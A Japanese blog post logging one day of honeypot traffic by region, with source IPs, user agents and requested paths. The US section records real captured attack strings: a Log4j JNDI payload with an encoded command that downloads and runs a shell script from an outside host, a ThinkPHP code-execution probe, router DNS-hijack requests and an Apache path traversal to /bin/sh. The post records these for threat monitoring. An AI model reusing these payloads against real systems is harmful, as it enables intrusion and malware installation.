2022/09/02 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/09/02分です。

特徴

共通

zgrabによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為

Location:JP

Nmap Scripting Engineによるスキャン行為
ZmEuによるスキャン行為
aiohttpによるスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
IntelBras WRN 340の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.gitへのスキャン行為
Laravelへのスキャン行為

を確認しました。

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
IntelBras WRN 340の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為

を確認しました。

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
IntelBras WRN 340の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, Worldであるアクセス

を確認しました。

他

アクセス数推移

JP：総アクセス数：208 (前日比：125)
US：総アクセス数：215 (前日比：147)
UK：総アクセス数：68 (前日比：-2)
SG：総アクセス数：79 (前日比：-2)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.209	Romania
2	20.125.150.225	United States
1	35.86.189.230	United States
8	44.200.189.44	United States
2	45.11.57.48	Ukraine
1	45.119.210.86	United States
1	51.13.169.45	United Kingdom
1	92.118.39.30	Romania
15	95.214.235.205	Ukraine
1	104.45.132.35	United States
4	109.69.66.105	Germany
2	109.237.103.9	Russia
2	109.237.103.118	Russia
2	109.237.103.123	Russia
8	135.125.246.110	France
9	135.125.246.189	France
7	137.184.214.194	United States
1	143.244.154.134	United States
119	153.134.15.131	Japan
1	156.146.36.76	United Kingdom
1	157.245.126.111	United States
1	159.203.69.125	United States
2	161.35.213.88	United States
1	167.99.229.254	United States
1	172.105.89.161	United States
1	181.214.218.69	United States
2	185.100.87.136	Seychelles
4	185.142.236.40	Seychelles
1	192.241.213.68	United States
1	192.241.213.128	United States
1	205.185.116.25	United States
1	205.210.31.17	United States
2	209.141.43.93	United States
1	209.141.55.120	United States

UserAgent一覧

件数	UserAgent
14	`-`
1	`AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9`
2	`Go-http-client/1.1`
2	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`
1	`Mozilla/5.0 (Linux; Android 5.1.1; SM-J200M Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
119	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36`
38	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
4	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
1	`Mozilla/5.0 zgrab/0.x`
1	`Python/3.7 aiohttp/3.7.4.post0`
2	`ZmEu`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_18.179.20.5_80\n`
3		`\x16\x03\x01\x01D\x01`
5		`\x16\x03\x01`
41	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/1phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/2phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/99vt`	HTTP/1.1
1	GET	`/99vu`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/MyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/PMA/index.php?lang=en`	HTTP/1.1
1	GET	`/_phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/_phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/_phpmyadmin_/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/db/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/sqladmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/sysadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/admin/web/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/PMA/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/admin/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/db/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/administrator/web/index.php?lang=en`	HTTP/1.1
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/database/index.php?lang=en`	HTTP/1.1
1	GET	`/db/db-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/dbadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/dbweb/index.php?lang=en`	HTTP/1.1
1	GET	`/db/index.php?lang=en`	HTTP/1.1
1	GET	`/db/myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin-3/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin-4/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin-5/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpmyadmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpmyadmin4/index.php?lang=en`	HTTP/1.1
1	GET	`/db/phpmyadmin5/index.php?lang=en`	HTTP/1.1
1	GET	`/db/webadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/db/webdb/index.php?lang=en`	HTTP/1.1
1	GET	`/db/websql/index.php?lang=en`	HTTP/1.1
1	GET	`/dbadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/home`	HTTP/1.1
1	GET	`/myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/admin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/db/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/dbadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/mysqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/pMA/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/sqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/mysql/web/index.php?lang=en`	HTTP/1.1
1	GET	`/mysqladmin/index.php?lang=en`	HTTP/1.1
1	GET	`/mysqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/nmaplowercheck1662004864`	HTTP/1.1
1	GET	`/oam/server/opensso/sessionservice`	HTTP/1.1
1	GET	`/php-my-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/php-myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-4.9.7/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-4/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.0/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.2/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.1.3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5.2.0/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin-5/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`/phpMyAdmin1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin2/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin4/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin5.1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin5.2/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin5/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyAdmin_/index.php?lang=en`	HTTP/1.1
1	GET	`/phpMyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmy-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmy/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin1/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2011/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2012/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2013/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2014/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2015/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2016/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2017/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2018/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2019/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2020/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2021/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin2022/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin4/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin5/index.php?lang=en`	HTTP/1.1
1	GET	`/phpmyadmin_/index.php?lang=en`	HTTP/1.1
1	GET	`/phppma/index.php?lang=en`	HTTP/1.1
1	GET	`/pma/index.php?lang=en`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/program/index.php?lang=en`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shopdb/index.php?lang=en`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/sql/myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/php-myadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpMyAdmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpMyAdmin2/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmy-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmyadmin3/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmyadmin4/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/phpmyadmin5/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/sql-admin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/sql/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/sqladmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/sqlweb/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/webadmin/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/webdb/index.php?lang=en`	HTTP/1.1
1	GET	`/sql/websql/index.php?lang=en`	HTTP/1.1
1	GET	`/sqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/w00tw00t.at.blackhats.romanian.anti-sec:)`	HTTP/1.1
1	GET	`/wp-content/`	HTTP/1.1
1	GET	`/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en`	HTTP/1.1
2	GET	`http[:]//example[.]com/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	OPTIONS	`/`	HTTP/1.1
1	POST	`/66048308`	HTTP/1.1
2	POST	`/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7`	HTTP/1.1
2	POST	`/index.htm`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.57.36.235	United States
2	20.168.6.174	United States
1	44.228.130.237	United States
19	51.79.29.48	Canada
4	54.37.79.75	France
1	66.240.192.82	United States
2	80.66.88.215	Russia
2	92.255.85.183	Hong Kong
1	102.50.242.155	Morocco
2	109.237.103.9	Russia
2	109.237.103.123	Russia
1	146.70.41.144	Romania
1	147.182.181.147	United States
7	152.89.196.62	Russia
1	159.203.18.80	United States
1	159.223.122.31	United States
2	161.35.108.75	United States
2	162.142.125.10	United States
9	164.52.24.190	China
7	167.99.147.151	United States
2	167.248.133.45	United States
1	172.105.77.209	United States
8	185.254.196.223	Ukraine
1	192.241.206.64	United States
1	192.241.206.85	United States
1	192.241.208.247	United States
1	192.241.221.41	United States
125	193.29.60.164	Germany
1	193.56.29.152	United Kingdom
2	194.26.228.174	Russia
1	198.98.52.214	United States
1	198.235.24.139	United States
1	205.185.116.89	United States
1	205.210.31.151	United States

UserAgent一覧

件数	UserAgent
22	`-`
2	`Go-http-client/1.1`
3	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
7	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
125	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0`
38	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)`
3	`Mozilla/5.0 zgrab/0.x`
1	`Roku/DVP-9.10 (289.10E04111A)`
2	`t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//159[.]203[.]185[.]250:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE5Mi4yNDEuMTUyLjExNC9jMHIwbjR4LnNoOyBjdXJsIC1PIGh0dHA6Ly8xOTIuMjQxLjE1Mi4xMTQvYzByMG40eC5zaDsgY2htb2QgNzc3IGMwcjBuNHguc2g7IHNoIGMwcjBuNHguc2g=}')`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
4		`\x03`
2		`\x16\x03\x01\x01D\x01`
2		`\x16\x03\x01\x01`	\x01
9		`\x16\x03\x01`
41	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/0bef`	HTTP/1.0
2	GET	`/:80:undefined?id=`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin/.git/config`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/admin/config`	HTTP/1.1
1	GET	`/api/.git/config`	HTTP/1.1
1	GET	`/api/`	HTTP/1.1
1	GET	`/api/config`	HTTP/1.1
1	GET	`/api`	HTTP/1.1
1	GET	`/app/.git/config`	HTTP/1.1
1	GET	`/app/`	HTTP/1.1
1	GET	`/app/config`	HTTP/1.1
1	GET	`/app`	HTTP/1.1
1	GET	`/backend/.git/config`	HTTP/1.1
1	GET	`/backend/`	HTTP/1.1
1	GET	`/backend/config`	HTTP/1.1
1	GET	`/backend`	HTTP/1.1
1	GET	`/backup/.git/config`	HTTP/1.1
1	GET	`/backup/`	HTTP/1.1
1	GET	`/backup/config`	HTTP/1.1
1	GET	`/backup`	HTTP/1.1
1	GET	`/bak/.git/config`	HTTP/1.1
1	GET	`/bak/`	HTTP/1.1
1	GET	`/bak/config`	HTTP/1.1
1	GET	`/bak`	HTTP/1.1
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/cfg/.git/config`	HTTP/1.1
1	GET	`/cfg/`	HTTP/1.1
1	GET	`/cfg/config`	HTTP/1.1
1	GET	`/cfg`	HTTP/1.1
1	GET	`/cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save&sel=dynamic&dns_dynamic_chk=on&fdns_dynamic1=128.0.104.18&fdns_dynamic2=128.0.104.33&fdns_dynamic3=128.0.104.18&fdns_dynamic4=128.0.104.18&sdns_dynamic1=128.0.104.18&sdns_dynamic2=128.0.104.33&sdns_dynamic3=128.0.104.18&sdns_dynamic4=128.0.104.33&userid=&passwd=&mtu=1454&ip1=192&ip2=168&ip3=254&ip4=2&sm1=255&sm2=255&sm3=255&sm4=0&gw1=192&gw2=168&gw3=254&gw4=254&fdns1=&fdns2=&fdns3=&fdns4=&sdns1=&sdns2=&sdns3=&sdns4=&static_mtu=150`	HTTP/1.1
1	GET	`/conf/.git/config`	HTTP/1.1
1	GET	`/conf/`	HTTP/1.1
1	GET	`/conf/config`	HTTP/1.1
1	GET	`/conf`	HTTP/1.1
1	GET	`/config/.git/config`	HTTP/1.1
1	GET	`/config/`	HTTP/1.1
1	GET	`/config/config`	HTTP/1.1
2	GET	`/config`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/cron/`	HTTP/1.1
1	GET	`/cron`	HTTP/1.1
1	GET	`/data/.git/config`	HTTP/1.1
1	GET	`/data/`	HTTP/1.1
1	GET	`/data/config`	HTTP/1.1
1	GET	`/data`	HTTP/1.1
1	GET	`/download/`	HTTP/1.1
1	GET	`/download`	HTTP/1.1
1	GET	`/downloads/`	HTTP/1.1
1	GET	`/downloads`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/files`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/git/.git/config`	HTTP/1.1
1	GET	`/git/`	HTTP/1.1
1	GET	`/git/config`	HTTP/1.1
1	GET	`/git`	HTTP/1.1
1	GET	`/goform/formDNS?dnsMode=dnsManual&dns1=128.0.104.18&dns2=128.0.104.18&dns3=128.0.104.33`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/inc/.git/config`	HTTP/1.1
1	GET	`/inc/`	HTTP/1.1
1	GET	`/inc/config`	HTTP/1.1
1	GET	`/inc`	HTTP/1.1
1	GET	`/include/.git/config`	HTTP/1.1
1	GET	`/include/`	HTTP/1.1
1	GET	`/include/config`	HTTP/1.1
1	GET	`/include`	HTTP/1.1
1	GET	`/includes/.git/config`	HTTP/1.1
1	GET	`/includes/`	HTTP/1.1
1	GET	`/includes/config`	HTTP/1.1
1	GET	`/includes`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/lib/.git/config`	HTTP/1.1
1	GET	`/lib/`	HTTP/1.1
1	GET	`/lib/config`	HTTP/1.1
1	GET	`/lib`	HTTP/1.1
1	GET	`/libs/.git/config`	HTTP/1.1
1	GET	`/libs/`	HTTP/1.1
1	GET	`/libs/config`	HTTP/1.1
1	GET	`/libs`	HTTP/1.1
1	GET	`/log/`	HTTP/1.1
1	GET	`/log`	HTTP/1.1
1	GET	`/logs/`	HTTP/1.1
1	GET	`/logs`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/rest/.git/config`	HTTP/1.1
1	GET	`/rest/`	HTTP/1.1
1	GET	`/rest/config`	HTTP/1.1
1	GET	`/rest`	HTTP/1.1
1	GET	`/service/.git/config`	HTTP/1.1
1	GET	`/service/`	HTTP/1.1
1	GET	`/service/config`	HTTP/1.1
1	GET	`/service`	HTTP/1.1
1	GET	`/services/.git/config`	HTTP/1.1
1	GET	`/services/`	HTTP/1.1
1	GET	`/services/config`	HTTP/1.1
1	GET	`/services`	HTTP/1.1
1	GET	`/source/.git/config`	HTTP/1.1
1	GET	`/source/`	HTTP/1.1
1	GET	`/source/config`	HTTP/1.1
1	GET	`/source`	HTTP/1.1
1	GET	`/sources/.git/config`	HTTP/1.1
1	GET	`/sources/`	HTTP/1.1
1	GET	`/sources/config`	HTTP/1.1
1	GET	`/sources`	HTTP/1.1
1	GET	`/src/.git/config`	HTTP/1.1
1	GET	`/src/`	HTTP/1.1
1	GET	`/src/config`	HTTP/1.1
1	GET	`/src`	HTTP/1.1
1	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/svc/.git/config`	HTTP/1.1
1	GET	`/svc/`	HTTP/1.1
1	GET	`/svc/config`	HTTP/1.1
1	GET	`/svc`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/temp/.git/config`	HTTP/1.1
1	GET	`/temp/`	HTTP/1.1
1	GET	`/temp/config`	HTTP/1.1
1	GET	`/temp`	HTTP/1.1
1	GET	`/test/.git/config`	HTTP/1.1
1	GET	`/test/`	HTTP/1.1
1	GET	`/test/config`	HTTP/1.1
1	GET	`/test`	HTTP/1.1
1	GET	`/tmp/.git/config`	HTTP/1.1
1	GET	`/tmp/`	HTTP/1.1
1	GET	`/tmp/config`	HTTP/1.1
1	GET	`/tmp`	HTTP/1.1
1	GET	`/upload/`	HTTP/1.1
1	GET	`/upload`	HTTP/1.1
1	GET	`/uploads/`	HTTP/1.1
1	GET	`/uploads`	HTTP/1.1
1	GET	`/wallet/`	HTTP/1.1
1	GET	`/wallet`	HTTP/1.1
1	GET	`/wallets/`	HTTP/1.1
1	GET	`/wallets`	HTTP/1.1
1	GET	`http[:]//us[.]vansto[.]net/verify.txt`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	OPTIONS	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.209	Romania
1	18.144.24.10	United States
1	20.168.55.87	United States
1	45.95.55.212	Germany
1	45.95.55.245	Germany
3	90.151.171.106	Russia
1	92.119.177.20	Romania
2	109.237.103.118	Russia
2	109.237.103.123	Russia
1	117.212.160.11	India
9	152.89.196.62	Russia
1	157.245.78.71	United States
7	159.203.46.216	United States
1	159.203.183.146	United States
1	172.105.77.209	United States
1	175.107.1.127	Pakistan
1	184.105.139.116	United States
10	185.213.175.12	Spain
1	185.220.101.191	Germany
8	185.254.196.223	Ukraine
1	192.241.207.136	United States
1	192.241.215.109	United States
1	192.241.220.117	United States
1	192.241.220.223	United States
3	194.26.228.174	Russia
2	194.165.16.10	Panama
2	194.165.16.37	Panama
1	205.210.31.32	United States
1	209.127.109.71	Canada
1	209.141.36.112	United States

UserAgent一覧

件数	UserAgent
19	`-`
2	`Go-http-client/1.1`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
11	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
